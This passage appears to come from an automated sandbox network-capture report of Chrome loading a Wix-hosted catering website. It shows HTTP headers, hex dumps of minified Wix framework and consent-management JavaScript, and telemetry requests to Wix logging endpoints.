                                                                                                                                                                                                                        x-gcp-cdn-pop: LGA-991dec68
                                                                                                                                                                                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                        2025-01-10 13:52:38 UTC228INData Raw: 22 75 73 65 20 73 74 72 69 63 74 22 3b 28 73 65 6c 66 2e 77 65 62 70 61 63 6b 4a 73 6f 6e 70 5f 5f 77 69 78 5f 74 68 75 6e 64 65 72 62 6f 6c 74 5f 61 70 70 3d 73 65 6c 66 2e 77 65 62 70 61 63 6b 4a 73 6f 6e 70 5f 5f 77 69 78 5f 74 68 75 6e 64 65 72 62 6f 6c 74 5f 61 70 70 7c 7c 5b 5d 29 2e 70 75 73 68 28 5b 5b 32 35 34 35 5d 2c 7b 38 31 30 39 35 3a 28 65 2c 74 2c 6e 29 3d 3e 7b 6e 2e 64 28 74 2c 7b 63 72 65 61 74 65 43 6f 6d 70 6f 6e 65 6e 74 73 52 65 67 69 73 74 72 79 43 53 52 3a 28 29 3d 3e 70 7d 29 3b 76 61 72 20 6f 3d 6e 28 37 36 39 30 34 29 3b 76 61 72 20 73 3d 6e 28 34 30 39 38 33 29 3b 63 6f 6e 73 74 20 72 3d 28 30 2c 6e 28 38 33 33 38 29 2e 49 71 29 28 7b 68 6f 73 74
                                                                                                                                                                                                                        Data Ascii: "use strict";(self.webpackJsonp__wix_thunderbolt_app=self.webpackJsonp__wix_thunderbolt_app||[]).push([[2545],{81095:(e,t,n)=>{n.d(t,{createComponentsRegistryCSR:()=>p});var o=n(76904);var s=n(40983);const r=(0,n(8338).Iq)({host
                                                                                                                                                                                                                        2025-01-10 13:52:38 UTC913INData Raw: 3a 22 74 68 75 6e 64 65 72 62 6f 6c 74 22 7d 29 3b 76 61 72 20 69 3d 6e 28 35 36 39 30 30 29 3b 63 6f 6e 73 74 20 61 3d 28 30 2c 73 2e 4b 29 28 7b 68 6f 73 74 3a 22 76 69 65 77 65 72 22 7d 29 3b 61 73 79 6e 63 20 66 75 6e 63 74 69 6f 6e 20 70 28 7b 72 75 6e 41 6e 64 52 65 70 6f 72 74 3a 65 7d 29 7b 77 69 6e 64 6f 77 2e 63 6f 6d 70 6f 6e 65 6e 74 73 52 65 67 69 73 74 72 79 26 26 61 77 61 69 74 20 77 69 6e 64 6f 77 2e 63 6f 6d 70 6f 6e 65 6e 74 73 52 65 67 69 73 74 72 79 2e 72 75 6e 74 69 6d 65 52 65 61 64 79 3b 63 6f 6e 73 74 20 74 3d 77 69 6e 64 6f 77 2e 63 6f 6d 70 6f 6e 65 6e 74 73 52 65 67 69 73 74 72 79 3f 2e 72 75 6e 74 69 6d 65 2c 6e 3d 77 69 6e 64 6f 77 2e 76 69 65 77 65 72 4d 6f 64 65 6c 2e 63 6f 6d 70 6f 6e 65 6e 74 73 4c 69 62 72 61 72 69 65 73
                                                                                                                                                                                                                        Data Ascii: :"thunderbolt"});var i=n(56900);const a=(0,s.K)({host:"viewer"});async function p({runAndReport:e}){window.componentsRegistry&&await window.componentsRegistry.runtimeReady;const t=window.componentsRegistry?.runtime,n=window.viewerModel.componentsLibraries


                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                        30192.168.2.54974634.49.229.814435852C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                        2025-01-10 13:52:38 UTC626OUTGET /services/wix-thunderbolt/dist/group_2.484922c1.chunk.min.js HTTP/1.1
                                                                                                                                                                                                                        Host: static.parastorage.com
                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                        sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                        Origin: https://www.samantacatering.com
                                                                                                                                                                                                                        sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                        sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                        Accept: */*
                                                                                                                                                                                                                        Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                        Sec-Fetch-Mode: cors
                                                                                                                                                                                                                        Sec-Fetch-Dest: script
                                                                                                                                                                                                                        Referer: https://www.samantacatering.com/
                                                                                                                                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                        2025-01-10 13:52:38 UTC1166INHTTP/1.1 200 OK
                                                                                                                                                                                                                        Date: Thu, 09 Jan 2025 09:31:24 GMT
                                                                                                                                                                                                                        Content-Type: application/javascript
                                                                                                                                                                                                                        Content-Length: 49944
                                                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                                                        X-Amz-Replication-Status: COMPLETED
                                                                                                                                                                                                                        Last-Modified: Thu, 09 Jan 2025 09:13:02 GMT
                                                                                                                                                                                                                        ETag: "089a2f90edf2b72a82054ff2dbc394ff"
                                                                                                                                                                                                                        X-Amz-Server-Side-Encryption: AES256
                                                                                                                                                                                                                        X-Amz-Version-Id: ZoF7_bweMyBuCl3J5n7bPomCjvtmE.oe
                                                                                                                                                                                                                        Server: Pepyaka/1.21.6
                                                                                                                                                                                                                        Access-Control-Allow-Methods: GET, OPTIONS, POST
                                                                                                                                                                                                                        Access-Control-Allow-Headers: DNT,X-CustomHeader,Keep-Alive,User-Agent,X-Requested-With,If-Modified-Since,Cache-Control,Content-*
                                                                                                                                                                                                                        Timing-Allow-Origin: *
                                                                                                                                                                                                                        Access-Control-Allow-Origin: *
                                                                                                                                                                                                                        X-Varnish: 1008369445 220849395
                                                                                                                                                                                                                        Via: 1.1 varnish (Varnish/6.0),1.1 varnish (Varnish/6.0), 1.1 google
                                                                                                                                                                                                                        X-Cluster-Self-Is-Next: false
                                                                                                                                                                                                                        X-Varnish: 1021883730
                                                                                                                                                                                                                        Age: 102073
                                                                                                                                                                                                                        X-Cache-Status: HIT
                                                                                                                                                                                                                        X-Seen-By: aVxMblM8KFG3we5NLvyVc75LqHKURxvujjeddHLBCHZn+PxHDBkh4V2x50EyEnEQ
                                                                                                                                                                                                                        Cache-Control: public, max-age=7776000, immutable
                                                                                                                                                                                                                        X-Cluster-Node-Role: proxy
                                                                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                                                                        x-cache: miss
                                                                                                                                                                                                                        glb-x-seen-by: qhk2IXhXaFW+ScoHjRxEUvX1Zxk6j9wOS6tQMkUbOP0=
                                                                                                                                                                                                                        x-gcp-cdn-pop: LGA-12baf686
                                                                                                                                                                                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                        2025-01-10 13:52:38 UTC224INData Raw: 28 73 65 6c 66 2e 77 65 62 70 61 63 6b 4a 73 6f 6e 70 5f 5f 77 69 78 5f 74 68 75 6e 64 65 72 62 6f 6c 74 5f 61 70 70 3d 73 65 6c 66 2e 77 65 62 70 61 63 6b 4a 73 6f 6e 70 5f 5f 77 69 78 5f 74 68 75 6e 64 65 72 62 6f 6c 74 5f 61 70 70 7c 7c 5b 5d 29 2e 70 75 73 68 28 5b 5b 38 35 31 5d 2c 7b 33 31 31 32 34 3a 28 29 3d 3e 7b 28 28 29 3d 3e 7b 76 61 72 20 65 3d 7b 32 31 32 3a 0a 2f 2a 21 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 21 2a 5c 0a 20 20 21 2a 2a 2a 20 2e 2e 2f 2e 2e 2f 6e 6f 64 65 5f 6d 6f 64 75 6c 65
                                                                                                                                                                                                                        Data Ascii: (self.webpackJsonp__wix_thunderbolt_app=self.webpackJsonp__wix_thunderbolt_app||[]).push([[851],{31124:()=>{(()=>{var e={212:/*!*******************************************************************!*\ !*** ../../node_module
                                                                                                                                                                                                                        2025-01-10 13:52:38 UTC1390INData Raw: 73 2f 40 62 61 62 65 6c 2f 72 75 6e 74 69 6d 65 2f 68 65 6c 70 65 72 73 2f 64 65 66 69 6e 65 50 72 6f 70 65 72 74 79 2e 6a 73 20 2a 2a 2a 21 0a 20 20 5c 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2f 28 65 2c 74 2c 6e 29 3d 3e 7b 76 61 72 20 72 3d 6e 28 2f 2a 21 20 2e 2f 74 6f 50 72 6f 70 65 72 74 79 4b 65 79 2e 6a 73 20 2a 2f 33 34 37 29 3b 65 2e 65 78 70 6f 72 74 73 3d 66 75 6e 63 74 69 6f 6e 28 65 2c 74 2c 6e 29 7b 72 65 74 75 72 6e 28 74 3d 72 28 74 29 29 69 6e 20 65 3f 4f 62 6a 65 63 74 2e 64 65 66 69 6e 65 50 72 6f 70 65 72 74 79 28 65 2c 74 2c 7b 76 61 6c 75 65 3a 6e 2c 65 6e 75 6d 65 72 61 62
                                                                                                                                                                                                                        Data Ascii: s/@babel/runtime/helpers/defineProperty.js ***! \*******************************************************************/(e,t,n)=>{var r=n(/*! ./toPropertyKey.js */347);e.exports=function(e,t,n){return(t=r(t))in e?Object.defineProperty(e,t,{value:n,enumerab
                                                                                                                                                                                                                        2025-01-10 13:52:38 UTC1390INData Raw: 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 21 2a 5c 0a 20 20 21 2a 2a 2a 20 2e 2e 2f 2e 2e 2f 6e 6f 64 65 5f 6d 6f 64 75 6c 65 73 2f 40 62 61 62 65 6c 2f 72 75 6e 74 69 6d 65 2f 68 65 6c 70 65 72 73 2f 74 79 70 65 6f 66 2e 6a 73 20 2a 2a 2a 21 0a 20 20 5c 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2f 65 3d 3e 7b 66 75 6e 63 74 69 6f 6e 20 74 28 6e 29 7b 72 65 74 75 72 6e 20 65 2e 65 78 70 6f 72 74 73 3d 74 3d 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 74 79 70 65 6f 66 20 53 79 6d 62 6f 6c 26 26 22 73 79 6d 62 6f 6c 22 3d 3d 74 79 70 65 6f 66 20 53 79 6d 62 6f 6c 2e 69 74 65 72 61
                                                                                                                                                                                                                        Data Ascii: *******************************!*\ !*** ../../node_modules/@babel/runtime/helpers/typeof.js ***! \***********************************************************/e=>{function t(n){return e.exports=t="function"==typeof Symbol&&"symbol"==typeof Symbol.itera
                                                                                                                                                                                                                        2025-01-10 13:52:38 UTC1390INData Raw: 3f 76 6f 69 64 20 30 3a 74 2e 72 65 70 6c 61 63 65 28 22 3b 22 2c 22 22 29 29 7c 7c 76 6f 69 64 20 30 7d 76 61 72 20 61 3d 6e 28 32 31 32 29 2c 63 3d 6e 2e 6e 28 61 29 3b 66 75 6e 63 74 69 6f 6e 20 6c 28 65 2c 74 29 7b 74 72 79 7b 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 74 79 70 65 6f 66 20 65 26 26 65 28 74 29 7d 63 61 74 63 68 28 65 29 7b 63 6f 6e 73 6f 6c 65 26 26 63 6f 6e 73 6f 6c 65 2e 65 72 72 6f 72 28 65 29 7d 7d 63 6f 6e 73 74 20 75 3d 7b 65 73 73 65 6e 74 69 61 6c 3a 21 30 2c 66 75 6e 63 74 69 6f 6e 61 6c 3a 21 30 2c 61 6e 61 6c 79 74 69 63 73 3a 21 30 2c 61 64 76 65 72 74 69 73 69 6e 67 3a 21 30 2c 64 61 74 61 54 6f 54 68 69 72 64 50 61 72 74 79 3a 21 30 7d 2c 70 3d 7b 65 73 73 65 6e 74 69 61 6c 3a 21 30 2c 66 75 6e 63 74 69 6f 6e 61 6c 3a 21 30 2c
                                                                                                                                                                                                                        Data Ascii: ?void 0:t.replace(";",""))||void 0}var a=n(212),c=n.n(a);function l(e,t){try{"function"==typeof e&&e(t)}catch(e){console&&console.error(e)}}const u={essential:!0,functional:!0,analytics:!0,advertising:!0,dataToThirdParty:!0},p={essential:!0,functional:!0,
                                                                                                                                                                                                                        2025-01-10 13:52:38 UTC1390INData Raw: 75 6c 6c 3d 3d 28 6f 3d 6f 2e 77 69 78 54 61 67 4d 61 6e 61 67 65 72 29 3f 76 6f 69 64 20 30 3a 6f 2e 67 65 74 43 6f 6e 66 69 67 29 26 26 22 74 72 75 65 22 3d 3d 3d 28 6e 75 6c 6c 3d 3d 28 69 3d 77 69 6e 64 6f 77 29 7c 7c 6e 75 6c 6c 3d 3d 28 69 3d 69 2e 77 69 78 54 61 67 4d 61 6e 61 67 65 72 29 7c 7c 6e 75 6c 6c 3d 3d 28 69 3d 69 2e 67 65 74 43 6f 6e 66 69 67 28 29 29 7c 7c 6e 75 6c 6c 3d 3d 28 69 3d 69 2e 65 78 70 65 72 69 6d 65 6e 74 73 29 3f 76 6f 69 64 20 30 3a 69 5b 6e 5d 29 26 26 73 28 65 29 26 26 6e 61 76 69 67 61 74 6f 72 2e 67 6c 6f 62 61 6c 50 72 69 76 61 63 79 43 6f 6e 74 72 6f 6c 29 72 65 74 75 72 6e 20 64 3b 76 61 72 20 6e 2c 6f 2c 69 3b 72 65 74 75 72 6e 20 68 28 74 7c 7c 28 73 28 65 29 3f 70 3a 75 29 29 7d 28 65 2c 74 29 3b 72 65 74 75 72
                                                                                                                                                                                                                        Data Ascii: ull==(o=o.wixTagManager)?void 0:o.getConfig)&&"true"===(null==(i=window)||null==(i=i.wixTagManager)||null==(i=i.getConfig())||null==(i=i.experiments)?void 0:i[n])&&s(e)&&navigator.globalPrivacyControl)return d;var n,o,i;return h(t||(s(e)?p:u))}(e,t);retur
                                                                                                                                                                                                                        2025-01-10 13:52:38 UTC1390INData Raw: 66 79 28 74 68 69 73 2e 67 65 74 43 75 72 72 65 6e 74 43 6f 6e 73 65 6e 74 50 6f 6c 69 63 79 28 29 2e 70 6f 6c 69 63 79 29 29 29 2c 63 28 29 28 74 68 69 73 2c 22 69 6e 69 74 22 2c 28 65 3d 3e 7b 63 6f 6e 73 74 20 74 3d 22 73 74 72 69 6e 67 22 3d 3d 74 79 70 65 6f 66 20 65 3f 7b 62 61 73 65 55 72 6c 3a 65 7d 3a 7b 62 61 73 65 55 72 6c 3a 65 2e 62 61 73 65 55 72 6c 2c 63 6f 6e 73 65 6e 74 50 6f 6c 69 63 79 3a 65 2e 63 6f 6e 73 65 6e 74 50 6f 6c 69 63 79 7d 7c 7c 7b 7d 3b 74 2e 63 6f 6e 73 65 6e 74 50 6f 6c 69 63 79 26 26 28 74 2e 63 6f 6e 73 65 6e 74 50 6f 6c 69 63 79 3d 74 68 69 73 2e 67 65 74 56 61 6c 69 64 50 6f 6c 69 63 79 28 74 2e 63 6f 6e 73 65 6e 74 50 6f 6c 69 63 79 29 29 3b 63 6f 6e 73 74 20 6e 3d 74 68 69 73 2e 73 68 6f 75 6c 64 54 72 69 67 67 65
                                                                                                                                                                                                                        Data Ascii: fy(this.getCurrentConsentPolicy().policy))),c()(this,"init",(e=>{const t="string"==typeof e?{baseUrl:e}:{baseUrl:e.baseUrl,consentPolicy:e.consentPolicy}||{};t.consentPolicy&&(t.consentPolicy=this.getValidPolicy(t.consentPolicy));const n=this.shouldTrigge
                                                                                                                                                                                                                        2025-01-10 13:52:38 UTC1390INData Raw: 74 43 75 72 72 65 6e 74 43 6f 6e 73 65 6e 74 50 6f 6c 69 63 79 22 2c 28 28 29 3d 3e 79 28 74 68 69 73 2e 68 6f 73 74 6e 61 6d 65 2c 74 68 69 73 2e 63 6f 6e 66 69 67 2e 63 6f 6e 73 65 6e 74 50 6f 6c 69 63 79 29 29 29 2c 63 28 29 28 74 68 69 73 2c 22 5f 67 65 74 43 6f 6e 73 65 6e 74 50 6f 6c 69 63 79 48 65 61 64 65 72 22 2c 28 28 29 3d 3e 66 75 6e 63 74 69 6f 6e 28 65 2c 6e 29 7b 63 6f 6e 73 74 20 72 3d 79 28 65 2c 6e 29 2e 70 6f 6c 69 63 79 3b 6c 65 74 20 6f 3d 21 31 3b 63 6f 6e 73 74 20 73 3d 4f 62 6a 65 63 74 2e 6b 65 79 73 28 67 29 2e 72 65 64 75 63 65 28 28 28 65 2c 74 29 3d 3e 7b 63 6f 6e 73 74 20 6e 3d 67 5b 74 5d 2c 73 3d 72 5b 6e 5d 3b 72 65 74 75 72 6e 20 65 5b 74 5d 3d 73 3f 31 3a 30 2c 73 7c 7c 28 6f 3d 21 30 29 2c 65 7d 29 2c 7b 7d 29 3b 72 65
                                                                                                                                                                                                                        Data Ascii: tCurrentConsentPolicy",(()=>y(this.hostname,this.config.consentPolicy))),c()(this,"_getConsentPolicyHeader",(()=>function(e,n){const r=y(e,n).policy;let o=!1;const s=Object.keys(g).reduce(((e,t)=>{const n=g[t],s=r[n];return e[t]=s?1:0,s||(o=!0),e}),{});re
                                                                                                                                                                                                                        2025-01-10 13:52:38 UTC1390INData Raw: 65 65 7a 65 28 65 29 2c 77 72 69 74 61 62 6c 65 3a 21 31 2c 63 6f 6e 66 69 67 75 72 61 62 6c 65 3a 21 31 2c 65 6e 75 6d 65 72 61 62 6c 65 3a 21 30 7d 29 7d 28 29 2c 43 28 62 2c 5b 77 69 6e 64 6f 77 2c 64 6f 63 75 6d 65 6e 74 5d 2c 77 69 6e 64 6f 77 2e 63 6f 6e 73 65 6e 74 50 6f 6c 69 63 79 4d 61 6e 61 67 65 72 29 29 7d 29 28 29 7d 29 28 29 7d 2c 37 32 38 37 37 3a 65 3d 3e 7b 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 74 79 70 65 6f 66 20 4f 62 6a 65 63 74 2e 63 72 65 61 74 65 3f 65 2e 65 78 70 6f 72 74 73 3d 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 65 2e 73 75 70 65 72 5f 3d 74 2c 65 2e 70 72 6f 74 6f 74 79 70 65 3d 4f 62 6a 65 63 74 2e 63 72 65 61 74 65 28 74 2e 70 72 6f 74 6f 74 79 70 65 2c 7b 63 6f 6e 73 74 72 75 63 74 6f 72 3a 7b 76 61 6c 75 65 3a 65 2c 65
                                                                                                                                                                                                                        Data Ascii: eeze(e),writable:!1,configurable:!1,enumerable:!0})}(),C(b,[window,document],window.consentPolicyManager))})()})()},72877:e=>{"function"==typeof Object.create?e.exports=function(e,t){e.super_=t,e.prototype=Object.create(t.prototype,{constructor:{value:e,e
                                                                                                                                                                                                                        2025-01-10 13:52:38 UTC1390INData Raw: 74 69 6f 6e 20 61 28 65 2c 6e 29 7b 76 61 72 20 72 3d 7b 73 65 65 6e 3a 5b 5d 2c 73 74 79 6c 69 7a 65 3a 6c 7d 3b 72 65 74 75 72 6e 20 61 72 67 75 6d 65 6e 74 73 2e 6c 65 6e 67 74 68 3e 3d 33 26 26 28 72 2e 64 65 70 74 68 3d 61 72 67 75 6d 65 6e 74 73 5b 32 5d 29 2c 61 72 67 75 6d 65 6e 74 73 2e 6c 65 6e 67 74 68 3e 3d 34 26 26 28 72 2e 63 6f 6c 6f 72 73 3d 61 72 67 75 6d 65 6e 74 73 5b 33 5d 29 2c 6d 28 6e 29 3f 72 2e 73 68 6f 77 48 69 64 64 65 6e 3d 6e 3a 6e 26 26 74 2e 5f 65 78 74 65 6e 64 28 72 2c 6e 29 2c 43 28 72 2e 73 68 6f 77 48 69 64 64 65 6e 29 26 26 28 72 2e 73 68 6f 77 48 69 64 64 65 6e 3d 21 31 29 2c 43 28 72 2e 64 65 70 74 68 29 26 26 28 72 2e 64 65 70 74 68 3d 32 29 2c 43 28 72 2e 63 6f 6c 6f 72 73 29 26 26 28 72 2e 63 6f 6c 6f 72 73 3d 21
                                                                                                                                                                                                                        Data Ascii: tion a(e,n){var r={seen:[],stylize:l};return arguments.length>=3&&(r.depth=arguments[2]),arguments.length>=4&&(r.colors=arguments[3]),m(n)?r.showHidden=n:n&&t._extend(r,n),C(r.showHidden)&&(r.showHidden=!1),C(r.depth)&&(r.depth=2),C(r.colors)&&(r.colors=!
                                                                                                                                                                                                                        2025-01-10 13:52:38 UTC1390INData Raw: 28 44 61 74 65 2e 70 72 6f 74 6f 74 79 70 65 2e 74 6f 53 74 72 69 6e 67 2e 63 61 6c 6c 28 6e 29 2c 22 64 61 74 65 22 29 3b 69 66 28 77 28 6e 29 29 72 65 74 75 72 6e 20 70 28 6e 29 7d 76 61 72 20 6c 2c 76 3d 22 22 2c 54 3d 21 31 2c 4f 3d 5b 22 7b 22 2c 22 7d 22 5d 3b 28 67 28 6e 29 26 26 28 54 3d 21 30 2c 4f 3d 5b 22 5b 22 2c 22 5d 22 5d 29 2c 50 28 6e 29 29 26 26 28 76 3d 22 20 5b 46 75 6e 63 74 69 6f 6e 22 2b 28 6e 2e 6e 61 6d 65 3f 22 3a 20 22 2b 6e 2e 6e 61 6d 65 3a 22 22 29 2b 22 5d 22 29 3b 72 65 74 75 72 6e 20 62 28 6e 29 26 26 28 76 3d 22 20 22 2b 52 65 67 45 78 70 2e 70 72 6f 74 6f 74 79 70 65 2e 74 6f 53 74 72 69 6e 67 2e 63 61 6c 6c 28 6e 29 29 2c 53 28 6e 29 26 26 28 76 3d 22 20 22 2b 44 61 74 65 2e 70 72 6f 74 6f 74 79 70 65 2e 74 6f 55 54 43
                                                                                                                                                                                                                        Data Ascii: (Date.prototype.toString.call(n),"date");if(w(n))return p(n)}var l,v="",T=!1,O=["{","}"];(g(n)&&(T=!0,O=["[","]"]),P(n))&&(v=" [Function"+(n.name?": "+n.name:"")+"]");return b(n)&&(v=" "+RegExp.prototype.toString.call(n)),S(n)&&(v=" "+Date.prototype.toUTC


                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                        31192.168.2.54975134.149.206.2554435852C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                        2025-01-10 13:52:38 UTC641OUTPOST /api/v1/bulklog HTTP/1.1
                                                                                                                                                                                                                        Host: panorama.wixapps.net
                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                        Content-Length: 6163
                                                                                                                                                                                                                        sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                        sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                        sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                        Content-Type: text/plain;charset=UTF-8
                                                                                                                                                                                                                        Accept: */*
                                                                                                                                                                                                                        Origin: https://www.samantacatering.com
                                                                                                                                                                                                                        Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                        Sec-Fetch-Mode: cors
                                                                                                                                                                                                                        Sec-Fetch-Dest: empty
                                                                                                                                                                                                                        Referer: https://www.samantacatering.com/
                                                                                                                                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                        2025-01-10 13:52:38 UTC6163OUTData Raw: 7b 22 6d 65 73 73 61 67 65 73 22 3a 5b 7b 22 70 6c 61 74 66 6f 72 6d 22 3a 22 76 69 65 77 65 72 22 2c 22 6d 73 69 64 22 3a 22 38 66 63 31 31 33 38 63 2d 37 39 62 34 2d 34 65 32 39 2d 62 62 63 30 2d 64 35 35 31 63 36 63 61 37 31 61 66 22 2c 22 66 75 6c 6c 41 72 74 69 66 61 63 74 49 64 22 3a 22 63 6f 6d 2e 77 69 78 70 72 65 73 73 2e 68 74 6d 6c 2d 63 6c 69 65 6e 74 2e 77 69 78 2d 74 68 75 6e 64 65 72 62 6f 6c 74 22 2c 22 63 6f 6d 70 6f 6e 65 6e 74 49 64 22 3a 22 74 68 75 6e 64 65 72 62 6f 6c 74 22 2c 22 74 72 61 6e 73 61 63 74 69 6f 6e 4e 61 6d 65 22 3a 22 72 75 6e 54 68 75 6e 64 65 72 62 6f 6c 74 2d 63 6c 69 65 6e 74 22 2c 22 74 72 61 6e 73 61 63 74 69 6f 6e 41 63 74 69 6f 6e 22 3a 22 53 54 41 52 54 22 2c 22 73 65 73 73 69 6f 6e 49 64 22 3a 22 34 64 36 66
                                                                                                                                                                                                                        Data Ascii: {"messages":[{"platform":"viewer","msid":"8fc1138c-79b4-4e29-bbc0-d551c6ca71af","fullArtifactId":"com.wixpress.html-client.wix-thunderbolt","componentId":"thunderbolt","transactionName":"runThunderbolt-client","transactionAction":"START","sessionId":"4d6f
                                                                                                                                                                                                                        2025-01-10 13:52:38 UTC1152INHTTP/1.1 204 No Content
                                                                                                                                                                                                                        date: Fri, 10 Jan 2025 13:52:38 GMT
                                                                                                                                                                                                                        x-wix-responded-by: wix.monitoring.panorama.v1.log_entity:BulkLog:com.wixpress.monitoring.panorama
                                                                                                                                                                                                                        vary: Accept-Encoding
                                                                                                                                                                                                                        x-seen-by: rXUceJIlvIg2Ftogbhjv0Og62a44ElgmVCYE2CdObDBEQfi00LSS7LJu7sdkoLsDoTLPrXq8PErmBX+4AQ0udA==,r6yY0ta7bIKrqK70x072lZfi+mOt7Vtg5VOAdCsTIYA=,bOnBQDOCjWxRPsoIciwTIc/FT+E6cO6oPxOL7n0f2v/Z1y9bJ6AjWUSPG7YUP0gU3uPslPqM2ELofyWffCPqaA==
                                                                                                                                                                                                                        x-wix-request-id: 1736517158.468562040892125843884
                                                                                                                                                                                                                        x-seen-by: oDbbMvfdXCdtsgjD2KgaM8iHE4dbw+wewoJ5nvKoyjE=,m0j2EEknGIVUW/liY8BLLq5J0yOqL+vE1dvDiIrewOyWWveFEnegpnkLxzZh8fhS,rXUceJIlvIg2Ftogbhjv0Og62a44ElgmVCYE2CdObDBEQfi00LSS7LJu7sdkoLsDoTLPrXq8PErmBX+4AQ0udA==,r6yY0ta7bIKrqK70x072lZfi+mOt7Vtg5VOAdCsTIYA=,bOnBQDOCjWxRPsoIciwTIc/FT+E6cO6oPxOL7n0f2v/Z1y9bJ6AjWUSPG7YUP0gU3uPslPqM2ELofyWffCPqaA==
                                                                                                                                                                                                                        server: Pepyaka
                                                                                                                                                                                                                        x-wix-request-id: 1736517158.468562040892125843884
                                                                                                                                                                                                                        x-content-type-options: nosniff
                                                                                                                                                                                                                        access-control-allow-origin: *
                                                                                                                                                                                                                        referrer-policy: no-referrer-when-downgrade
                                                                                                                                                                                                                        via: 1.1 google
                                                                                                                                                                                                                        glb-x-seen-by: wMMTADooq5AJ3cFomJ/MuXOQWGce7NCZXKms1ErOpBs=
                                                                                                                                                                                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                                                                        Connection: close


                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                        32192.168.2.5497533.234.186.1414435852C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                        2025-01-10 13:52:38 UTC637OUTPOST /bolt-performance HTTP/1.1
                                                                                                                                                                                                                        Host: frog.wix.com
                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                        Content-Length: 942
                                                                                                                                                                                                                        sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                        sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                        sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                        Content-Type: text/plain;charset=UTF-8
                                                                                                                                                                                                                        Accept: */*
                                                                                                                                                                                                                        Origin: https://www.samantacatering.com
                                                                                                                                                                                                                        Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                        Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                        Sec-Fetch-Dest: empty
                                                                                                                                                                                                                        Referer: https://www.samantacatering.com/
                                                                                                                                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                        Accept-Language: en-US,en;q=0.9
